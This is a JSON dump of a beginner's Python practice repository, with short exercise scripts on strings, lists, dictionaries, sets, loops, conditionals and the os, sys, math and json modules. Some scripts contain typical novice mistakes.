"license_type": "no_license", "max_line_length": 20, "num_lines": 6, "path": "/sys.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import sys\n\n\nprint(len(sys.argv))\n\nprint(sys.argv)" }, { "alpha_fraction": 0.4935064911842346, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 14.199999809265137, "blob_id": "1560967c8f7becdd221af2c73c88c8342e66e202", "content_id": "9e10f09e4dca76052949e3c0c116b89081fbb737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 77, "license_type": "no_license", "max_line_length": 16, "num_lines": 5, "path": "/def_function.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "def add(a,b):\n sum=a+b\n return(sum)\nprint (add(3,3))\nprint (add(4,3))\n\n" }, { "alpha_fraction": 0.6715328693389893, "alphanum_fraction": 0.6934306621551514, "avg_line_length": 16.1875, "blob_id": "a04e6b63480fe29d95e3c439c7736bd16c3b6c40", "content_id": "1c04cd5a9fb1b66d4e60fc75d6237be8ead0ea2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 274, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/dict.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "# dictionary contains key value pairs\n\nA={'Age':24,'name':'rohith'}\nprint(A['Age'])\nprint(A['name'])\n# this is way more readbale\n#here values can be anything like dictionary ,array ,tuple\n\n\n#another way\n\na=[32,'john']\nprint(a[0])\nprint(a[1])\n\n#this is not in readable format" }, { "alpha_fraction": 0.539130449295044, "alphanum_fraction": 0.6173912882804871, "avg_line_length": 13.5, "blob_id": "a414c320ef943ada519e35cb564d52536c6a8c3c", "content_id": "af6eabc2ce4dfcaf6dd7e55eff7092e5870d39dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 115, "license_type": "no_license", "max_line_length": 26, "num_lines": 8, "path": "/membershipcheck.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "list=(1,2,3,4)\nprint(list)\nprint(1 in list)\n\n\na=[1,2,3,4,'rohith']\nprint('rohith' in a )\nprint('rohith' not in a )" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 15.833333015441895, "blob_id": "eec2541dd39e2f06b929ba276f726aad3bee71da", "content_id": "25f8064e41fb2f50f15197a70e335730a57293cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 20, "num_lines": 6, "path": "/os.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import os\nprint(os.name)\nprint(os.environ)\nprint(os.getlogin())\nprint(os.getppid)\nprint(os.getcwd())" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.7204301357269287, "avg_line_length": 17.799999237060547, "blob_id": "b274f1d8c8c760f6e2710f8ab9b10c1badf544e2", "content_id": "f96b3497bfed062760cf6c13a863d8d9790e305e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 45, "num_lines": 5, "path": "/sets.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "# sets are is an unorderd collection of items\n# every element is unique\n\nA={1,2,3,3}\nprint(A)" }, { "alpha_fraction": 0.7553191781044006, "alphanum_fraction": 0.7553191781044006, "avg_line_length": 18, "blob_id": "a7231fe647f923a939221fcfa490c90b1fafa926", "content_id": "9c744fe1a3576c51d2f9e214449ce03f2920f1e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 43, "num_lines": 5, "path": "/hello.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "print(\"hello world\")\n\nprint(\"welcome to edureka\")\n\nprint(\"Happy learning\\nwelcome to edureka\")" }, { "alpha_fraction": 0.5609756112098694, "alphanum_fraction": 0.5609756112098694, "avg_line_length": 19.5, "blob_id": "113cf25e897d27f8ef6468ab13ad4a66e171b1eb", "content_id": "8bb2ed9398465d6077f58170126d3ac513373eef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 37, "num_lines": 10, "path": "/attribute.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "class Edureka():\n def _init_(self):\n self.__pri=(\"i am private\")\n self._pro=(\"i am protactive\")\n self.pub=(\"i am public\")\n\nob=Edureka()\nprint(ob.pub)\nprint(ob._pro)\nprint(ob.__pri)\n" }, { "alpha_fraction": 0.6200000047683716, "alphanum_fraction": 0.6600000262260437, "avg_line_length": 13.428571701049805, "blob_id": "df641154ad500efd73bf59e4df42ed88d093d1ed", "content_id": "c430c40c40644f972368f91e1f2b8cd14a27bc5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/dictexample.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "dict={1:'python',2:'android'}\nprint(dict)\nprint(dict[1])\n\n\nperson=['rohit','ashok']\nprint(person[2])" }, { "alpha_fraction": 0.46341463923454285, "alphanum_fraction": 0.5934959053993225, "avg_line_length": 16.714284896850586, "blob_id": "dd0aefd3108e6ec9a28613bc70948ca34667928d", "content_id": "ad93eb445e383700684e140b0c1ebb705471898f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/ifelse.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=30\nif(a<10):\n print(\"less than 10\")\nif (10<=a<=25):\n print(\"inbetween 10 and 25\")\nelse:\n print(\"greater than 25\")" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6704545617103577, "avg_line_length": 21, "blob_id": "766c55f28887c94269154c859efe1e11e2a7bae0", "content_id": "d5860df1bfbebf87375cae065839716ea35200c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 31, "num_lines": 4, "path": "/json.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import json\ndate= {\"name\":\"alica\" ,\"age\":4}\njson_str = json.dumps(data)\nprint(json_str)\n" }, { "alpha_fraction": 0.5388888716697693, "alphanum_fraction": 0.5722222328186035, "avg_line_length": 12.923076629638672, "blob_id": "5ef02fc733368929706be39e87d89c8545b8e1f9", "content_id": "99ac7eeb5f36d9d3cb4379823aa761c4776a5a3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 180, "license_type": "no_license", "max_line_length": 29, "num_lines": 13, "path": "/fact.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "num=int(input(\"number:\"))\n\nfact=1\n\nif num <0:\n print(\"must be positive\")\nelif num == 0:\n print(\"fact = 1\")\nelse:\n for i in range(1,num+1):\n fact=fact*i\n\nprint(fact)" }, { "alpha_fraction": 0.5299999713897705, "alphanum_fraction": 0.6299999952316284, "avg_line_length": 10.11111068725586, "blob_id": "085c7f794bc160fd5a935fd64bc3dada1b1371e4", "content_id": "a756aa3224b4cc878dae0b1abaa4b7b7b0e854f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 25, "num_lines": 9, "path": "/num.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "A=10 #int\nB=2.64 # float\nC=10+2j # complex numbers\nD=5 + 4j\n\nprint(A)\nprint(B)\nprint(C)\nprint(D-C)\n" }, { "alpha_fraction": 0.49152541160583496, "alphanum_fraction": 0.5593220591545105, "avg_line_length": 7.5714287757873535, "blob_id": "3ad853610ab52ec2150eea7273d03b037eb566e1", "content_id": "34868eff10ce2a4f66f159dafe3782b0305cb9d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 13, "num_lines": 7, "path": "/global.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=50\ndef number():\n b=30\n print(b)\n\nprint(a)\nnumber()" }, { "alpha_fraction": 0.5374149680137634, "alphanum_fraction": 0.5850340127944946, "avg_line_length": 11.25, "blob_id": "0a00922646391bb877eea4acc39cb7b473aede68", "content_id": "c4aa111bd378391c1f138cef398e8ef029bd778d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 147, "license_type": "no_license", "max_line_length": 25, "num_lines": 12, "path": "/while.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "count=0\nwhile(count<5):\n print(count)\n count=count+1\nprint(\"good bye....!\")\n\n\n\nrank=5\nwhile(rank!=12):\n print(\"rank is\",rank)\n rank+=1\n" }, { "alpha_fraction": 0.664383590221405, "alphanum_fraction": 0.6780821681022644, "avg_line_length": 23.5, "blob_id": "0b15322e0f0564d463d17b99f9c774e289fcd1ba", "content_id": "2419cf5160acc0c3794f37c9ad51febfa63663a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 146, "license_type": "no_license", "max_line_length": 50, "num_lines": 6, "path": "/input.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "name=input(\"enter the name\")\nage=input(\"enter the age\")\n\nprint(\"welcome\",name)\nprint(\"age\",age)\nprint(\"after 5 years age will be :\", (int(age)+5))" }, { "alpha_fraction": 0.54347825050354, "alphanum_fraction": 0.6449275612831116, "avg_line_length": 7.5, "blob_id": "d0000f388269a274f6033b54a3f0cf31f8663a1c", "content_id": "e8f2900a0f502895c691c9d94a90786d2d5e447d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "no_license", "max_line_length": 16, "num_lines": 16, "path": "/variable.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "A=10\nB=\"rohith\"\nprint(A,B)\n\n\n#another example\n\nx,y,z=10,20,30\nprint(x,y,z)\n\n\n#another example\nx,y,z=10,20,30\nprint(x)\nprint(y)\nprint(z)\n\n\n" }, { "alpha_fraction": 0.7593985199928284, "alphanum_fraction": 0.7593985199928284, "avg_line_length": 15.75, "blob_id": "485793813dea301d32275e4f2849f49999c6c21b", "content_id": "1bec7900861f75ee3b3ff6924cbdc2b18f32c8f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 24, "num_lines": 8, "path": "/yogaday.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "today=\"wednesday\"\nyogaday=\"thursday\"\nhrx=\"monday\"\nsc=\"tuesday\"\nfootball=\"friday\"\ndance=\"saturday\"\nprint(today is yogaday )\nprint(hrx)" }, { "alpha_fraction": 0.6597222089767456, "alphanum_fraction": 0.6736111044883728, "avg_line_length": 15.11111068725586, "blob_id": "40d37988b88b2857633c757f2eaff91986bca230", "content_id": "ba3cc9ceaeb0222319102ab7c8b884cbc1386f4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 33, "num_lines": 9, "path": "/stringcapitalize.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str=\"rohith\"\nprint(str.capitalize())\nprint(str.count(\"oh\",0,len(str)))\nprint(max(str))\nprint(min(str))\n\n\ns=str.encode('utf-8','strict')\nprint(s)" }, { "alpha_fraction": 0.4385964870452881, "alphanum_fraction": 0.5263158082962036, "avg_line_length": 9.454545021057129, "blob_id": "ecb554635e5a6f427350d39da9630033af45fc8f", "content_id": "52a0f2e7c263f70096222c971137ab3b9dae3f6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114, "license_type": "no_license", "max_line_length": 26, "num_lines": 11, "path": "/setsexample.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "x= set(\"welcome to rohit\")\nprint(x)\n\n\na={1,2,3,4,5}\nb={4,5,6,7,8}\nprint(a|b)\nprint(a & b)\nprint(a -b)\n\ns={'a','b'}" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.6025640964508057, "avg_line_length": 8.875, "blob_id": "f769b769a4d7694550fe11988f2a724735166f2c", "content_id": "cb6662e694d6e8c12f199a062a64e896ba12c2c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 78, "license_type": "no_license", "max_line_length": 11, "num_lines": 8, "path": "/comparison.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=5\nb=10\nprint(a==b)\nprint(a!=b)\nprint(a>b)\nprint(a<b)\nprint(a>=b)\nprint(a<=b)" }, { "alpha_fraction": 0.604651153087616, "alphanum_fraction": 0.6899224519729614, "avg_line_length": 13.333333015441895, "blob_id": "874fb556281208c152da355ace3b61e1694b0f33", "content_id": "82f3316590c50c7ac0620c84199aaed518661a09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 18, "num_lines": 9, "path": "/strings.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str1=\"salaam \"\nstr2=\"rocky\"\nstr3=\"bhai\"\nprint(str1)\nprint(str2)\nprint(str3)\nprint(len(str1))\nprint(str1[1:3])\nprint('t' in str1)\n" }, { "alpha_fraction": 0.5755395889282227, "alphanum_fraction": 0.633093535900116, "avg_line_length": 18.85714340209961, "blob_id": "d7a0abcdd81720b0cfd523a9c86ec4b32c4964da", "content_id": "9545d05576b739951fabc5931cfe5b8e1e828edb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 50, "num_lines": 7, "path": "/ifelifelse.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "marks=70\nif(marks<40):\n print(\"fail\")\nelif(40<marks<=60):\n print(\"average\")\nelse:\n print(\"congrats! well done...you have passed\")\n" }, { "alpha_fraction": 0.5430809259414673, "alphanum_fraction": 0.6083551049232483, "avg_line_length": 17.285715103149414, "blob_id": "414250533340c166e6e1673a4b3218e6ac9d530e", "content_id": "7cd87da6cb6519aeeb79f4a7962b2c8dd844dda2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "no_license", "max_line_length": 39, "num_lines": 21, "path": "/file_op.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "list=[\"java\",\"python\",\"c\"]\nprint(list[1])\nprint(list[0:2])\nprint(list[-1])\nprint(list[-2])\nprint(list[-3])\n#print(list+[\"reactjs\",\"c++\"])\n#print(list*3)\n#print(\"java\" in list,\"golang\" in list)\n#list[1]=\"aws\"\n#print(list)\n#del(list[2])\n#print(list)\n\n#list1=[1,2,3,4,5,'a','b','c']\n#print(list.pop(3))\n#print(list1.remove(3))\n\n#print(list1)\nlist=[x**2 for x in [1,2,3,4,5]]\nprint(list)" }, { "alpha_fraction": 0.7021276354789734, "alphanum_fraction": 0.7021276354789734, "avg_line_length": 23, "blob_id": "182993da5a1c9c9ab9f1333d2947e663e73115a6", "content_id": "c3d7c1e7f4738804d101e78944c8829e88515037", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 30, "num_lines": 2, "path": "/print.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "print (\"rohith\")\nprint (\"i am learning python\")" }, { "alpha_fraction": 0.523809552192688, "alphanum_fraction": 0.5952380895614624, "avg_line_length": 19.5, "blob_id": "d51b592a563b74c64e2d88442ab29c4d532c0fcc", "content_id": "ba575ddfdd596791eb1243588abae55de158ee30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/atupleinsidelist.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "\n\nlist=[(1,2,3),(\"python\",\"java\")]\nprint(list)\nprint(len(list))\nprint(list[1][0:1])\n" }, { "alpha_fraction": 0.6091954112052917, "alphanum_fraction": 0.7241379022598267, "avg_line_length": 21, "blob_id": "4322367e812406e5aeb339163c48a4cb80f3fd7e", "content_id": "1b521d1ab25cf8863ff62562c22c324d1352ddc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 87, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/math.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import math \nprint(math.ceil(10.098))\nprint(math.copysign(10,-1))\nprint(math.fabs(-19))" }, { "alpha_fraction": 0.6015037298202515, "alphanum_fraction": 0.6240601539611816, "avg_line_length": 10.166666984558105, "blob_id": "7f6e99d8cdb1bda9261019de04e6c6cab38a4427", "content_id": "c85627e5ff5f22930816af39fc3759e3c16ced2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 39, "num_lines": 12, "path": "/for.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "fruits=['banana','carrot','putchattni']\n\nfor fruit in fruits:\n print(fruit)\n\n\n\n\nlist=[1,2,3,'banana']\n\nfor i in list:\n print(i)" }, { "alpha_fraction": 0.6497696042060852, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 20.799999237060547, "blob_id": "17cc35444c42cf745a7d2bff380aec12f2efb42d", "content_id": "55b52bf18e849871d197f1f8a0dbfee80f5eb75b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 53, "num_lines": 10, "path": "/tuple.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "list=(1,2,3,4)\nprint(list)\nprint(list[0]) # it will 1 beacuse its in zero index\nprint(list[1])\nprint(list[2])\nprint(list[3])\nprint(4 in list)\nprint(3 not in list)\n\n#list[3]=7 python doesnt not support item assignment" }, { "alpha_fraction": 0.6984127163887024, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20.16666603088379, "blob_id": "4b54abcfa528c69f52b9844fe7159645cbb65ad2", "content_id": "d615c24f105840ec03b4a95839e8f378e2308e0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 126, "license_type": "no_license", "max_line_length": 33, "num_lines": 6, "path": "/str.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str=input(\"enter the input\")\nprint(\"Recieved input is:\",str)\n\n\nstr1=input(\"enter the input\")\nprint(\"Revieved input is :\",str1)" }, { "alpha_fraction": 0.5826771855354309, "alphanum_fraction": 0.5984252095222473, "avg_line_length": 20.16666603088379, "blob_id": "97aaac8e88dd027290665ff1edae8bd3e8fc11d5", "content_id": "854c8c6ca36d7dec7abb4d1dcc384d9159415aca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 53, "num_lines": 6, "path": "/stringexample.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "name=\"rohith\"\nage=22\n\nprint(\"my name is %s and age is %d\" % (name,age))\n\nprint(\"my name is\" + name + \" and age is \" +str(age))\n" }, { "alpha_fraction": 0.6259542107582092, "alphanum_fraction": 0.6564885377883911, "avg_line_length": 14.411765098571777, "blob_id": "639ab94f499654d37c99b244b12493db08f46d40", "content_id": "ad9a77e2ddac9e4ce5bee38c9d0d3a335ad0297b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 262, "license_type": "no_license", "max_line_length": 49, "num_lines": 17, "path": "/list_example.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "list=[1,2,3]\nlist.append(\"machine learning\")\nprint(list)\n\n\nlist.extend(['g','h'])\nprint(list)\n\nlist.insert(1,'scripting')\nprint(list)\n\nlist.remove(3)\nprint(list)\n\nlist1=sorted(['python','java','dotnet','golang'])\nfor course in list1[::-1]:\n print(course)\n" }, { "alpha_fraction": 0.5984848737716675, "alphanum_fraction": 0.6439393758773804, "avg_line_length": 15.375, "blob_id": "5e8229166bad8f95244d61fd4f659e7f1e75f1c8", "content_id": "9223d412d5502e3a482e1aad0b1f6d7aaa632690", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 132, "license_type": "no_license", "max_line_length": 28, "num_lines": 8, "path": "/operation_read.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import os\nnewfile=open(\"ro.txt\",\"r\") \n\n\n#for i in range(1,10):\n# print(newfile.read())\nnewfile.seek(100)\nprint(newfile.tell())\n\n" }, { "alpha_fraction": 0.5785714387893677, "alphanum_fraction": 0.6642857193946838, "avg_line_length": 9.769230842590332, "blob_id": "0ba1d9968271e0126e1500c498d5bea33471bf29", "content_id": "06c7b94ed896065324d05bc7ceb2cdcb33c9493e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 23, "num_lines": 13, "path": "/morestrings.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str1=\"happy learning\"\n\nprint(str1[::-1])\n\nprint(str1[2:7])\n\nprint(str1.find(\"L\"))\n\nstr2=\"welcome to coorg\"\n\nprint(str1+str2)\n\nprint(str1*2)\n" }, { "alpha_fraction": 0.5461538434028625, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 13.44444465637207, "blob_id": "d630af405bdab7b14240a326b95cdc273af41149", "content_id": "e3e704a944015684d4bb00fe5c930b8c169fefc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 32, "num_lines": 9, "path": "/ifelif.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "X=10\nY=12\n\nif(X<Y):\n print('X is less than Y')\nelif(X>Y):\n print('X is greater than Y')\nelse:\n print('X and Y are equal')\n" }, { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 7.25, "blob_id": "152e772dfcfdd4c086a1167d737675087e396e3b", "content_id": "d6afba52d836183aa23e109368182f75165b29f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 33, "license_type": "no_license", "max_line_length": 15, "num_lines": 4, "path": "/README.md", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "# python_rohit\n\n\nLearning python\n" }, { "alpha_fraction": 0.5799999833106995, "alphanum_fraction": 0.6100000143051147, "avg_line_length": 8.899999618530273, "blob_id": "d05d1b4e113223300e7f6ae0304dbd95ee197cbe", "content_id": "164d3638312091c89fd6e987eccde3955cfd9f4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 11, "num_lines": 10, "path": "/operators.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "A=5\nB=10\nprint(A+B)\nprint(A-B)\nprint(A*B)\nprint(A/B)\nprint(A%B)\nprint(A**B)\nprint(A//B)\nprint(A-B)\n\n" }, { "alpha_fraction": 0.7285714149475098, "alphanum_fraction": 0.7357142567634583, "avg_line_length": 16.625, "blob_id": "d1d135a14639257663cfc5ca24afef0c6e92fc29", "content_id": "92f00371df4c0c1311952fc471ba88c2a0991c30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 53, "num_lines": 8, "path": "/comments.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "# this is the way to single commit write #\n\n'''\nsuppose you want to commit more code then add 3 lines\nbulk comment\nor \nmultiline comment\n'''" } ]
55
acaciawater/maps
https://github.com/acaciawater/maps
48bd369aeb58aba0e080b7a3c695a2bfb2a527c3
f300ea5b9a1d8fb2d7f82cdf4333f79b4a0303da
e8a0d98cb6c1c43b33377fee5fc5a69c284f8e79
refs/heads/master
2022-12-07T02:45:34.767049
2020-12-24T08:11:52
2020-12-24T08:11:52
186,702,279
0
0
null
2019-05-14T21:21:58
2020-12-24T08:12:06
2022-11-22T03:49:52
Python
[ { "alpha_fraction": 0.821052610874176, "alphanum_fraction": 0.821052610874176, "avg_line_length": 47, "blob_id": "558064c90b9ab5333770e4af03e1a2f84cead5af", "content_id": "6404ab02914e4405fad74648c97a557c865fe21f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 51, "num_lines": 2, "path": "/maps/__init__.py", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "from django.contrib.admin import default_app_config\ndefault_app_config = 'maps.apps.MapsConfig'" }, { "alpha_fraction": 0.5631974339485168, "alphanum_fraction": 0.5707128047943115, "avg_line_length": 29.082191467285156, "blob_id": "ac379eacc6f70c7ed0d57291c551266eaff7e83f", "content_id": "35d78674595eefb948607c1c519c20ba4e5c0079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4391, "license_type": "no_license", "max_line_length": 89, "num_lines": 146, "path": "/maps/static/js/betterwms.js", "repo_name": "acaciawater/maps", "src_encoding": "UTF-8", "text": "/**\n * \n */\nL.TileLayer.BetterWMS = L.TileLayer.WMS.extend({\n \n\t/**\n\t * creates an XSLTProcessor and loads stylesheet\n\t */\n loadStylesheet: function(url) {\n \tlet http = new XMLHttpRequest();\n\thttp.open(\"GET\",url,false);\n\thttp.send(\"\");\n\tlet xsl = http.responseXML;\n//\tconsole.debug(xsl);\n\tlet processor = new XSLTProcessor();\n\tprocessor.importStylesheet(xsl);\n\treturn processor;\n },\n \n onAdd: function (map) {\n // Triggered when the layer is added to a map.\n L.TileLayer.WMS.prototype.onAdd.call(this, map);\n if (this.wmsParams.clickable) {\n \tmap.on('click', this.getFeatureInfo, this);\n }\n },\n \n onRemove: function (map) {\n // Triggered when the layer is removed from a map.\n L.TileLayer.WMS.prototype.onRemove.call(this, map);\n if (this.wmsParams.clickable) {\n \tmap.off('click', this.getFeatureInfo, this);\n }\n },\n \n formatFeatureInfoResponseXSLT: function(response) {\n\t // format FeatureInfoResponse using a stylesheet\n\t if (this.xsltProcessor === undefined) {\n\t \tthis.xsltProcessor = this.loadStylesheet(\"/static/xsl/getfeatureinforesponse.xsl\");\n\t }\n\t\tlet doc = this.xsltProcessor.transformToDocument(response);\n\t\treturn doc.firstChild.innerHTML;\n\t },\n\n formatFeatureInfoResponse: function(response) {\n // customized formatting of FeatureResponse\n let props = this.wmsParams.propertyName;\n if (props)\n \t// use specified properties only\n \tprops = props.split(',');\n // use displayname instead of layer name\n let displayName = this.wmsParams.displayName;\n const resp= xml2json.docToJSON(response);\n let html = '<html><body><table>';\n let itemCount = 0;\n if (resp.tagName === 'GetFeatureInfoResponse') {\n \tif (resp.children) {\n\t \tresp.children.forEach(layer => {\n\t \t\tlet layerName = layer.attr.name;\n\t \t\tif (layerName === this.wmsParams.layers)\n\t \t\t\t// use provided display name (wmslayer's title)\n\t \t\t\tlayerName = displayName;\n\t\t\t\thtml += `<tr><th colspan=\"3\">${layerName}</th></tr>`;\n\t \t\tif (layer.children) {\n\t\t \t\tlayer.children.forEach(item => {\n\t\t \t\t\tif (item.tagName === 'Attribute') {\n\t\t \t\t\t\t// Raster Info: single attribute without feature(s)\n\t \t\t\t\t\tconst value = item.attr.value;\n\t \t\t\t\t\titemCount++;\n\t \t\t\t\t\thtml += `<tr>\n\t\t \t\t\t\t\t<td></td>\n\t\t \t\t\t\t\t<td>${name}</td>\n\t\t \t\t\t\t\t<td>${value}</td>\n\t\t \t\t\t\t\t</tr>`\n\t\t \t\t\t}\n\t\t \t\t\telse if (item.tagName === 'Feature') {\n\t\t \t\t\t\t// Vector Info (features)\n\t\t\t \t\t\tconst id = item.attr.id;\n\t\t\t \t\t\tif (item.children) {\n\t\t\t \t\t\t\titem.children.forEach(property => {\n\t\t\t\t \t\t\t\tif (property.tagName === 'Attribute') {\n\t\t\t\t \t\t\t\t\tconst name = property.attr.name;\n\t\t\t\t \t\t\t\t\tif (!props || props.includes(name)) {\n\t\t\t\t\t \t\t\t\t\tconst value = property.attr.value;\n\t\t\t\t\t \t\t\t\t\t// console.info(`layer=${layerName}, feature=${id}, ${name}=${value}`);\n\t\t\t\t\t \t\t\t\t\titemCount++;\n\t\t\t\t\t \t\t\t\t\thtml += `<tr>\n\t\t\t\t\t \t\t\t\t\t<td>${id}</td>\n\t\t\t\t\t \t\t\t\t\t<td>${name}</td>\n\t\t\t\t\t \t\t\t\t\t<td>${value}</td>\n\t\t\t\t\t \t\t\t\t\t</tr>`\n\t\t\t\t \t\t\t\t\t}\n\t\t\t\t \t\t\t\t}\n\t\t\t\t \t\t\t})\n\t\t\t \t\t\t}\n\t\t \t\t\t}\n\t\t \t\t})\n\t \t\t}\n\t \t})\n \t}\n }\n html += '</table></body></html>';\n return itemCount? html: null;\n },\n\n getFeatureInfo: function(evt) {\n const params = this.getFeatureInfoParams(evt.latlng);\n $.get(this._url,params).then(response => {\n \tconst html = this.formatFeatureInfoResponse(response);\n\t if (html) {\n\t \tL.popup({ maxWidth: 800})\n\t\t .setLatLng(evt.latlng)\n\t\t .setContent(html)\n\t\t 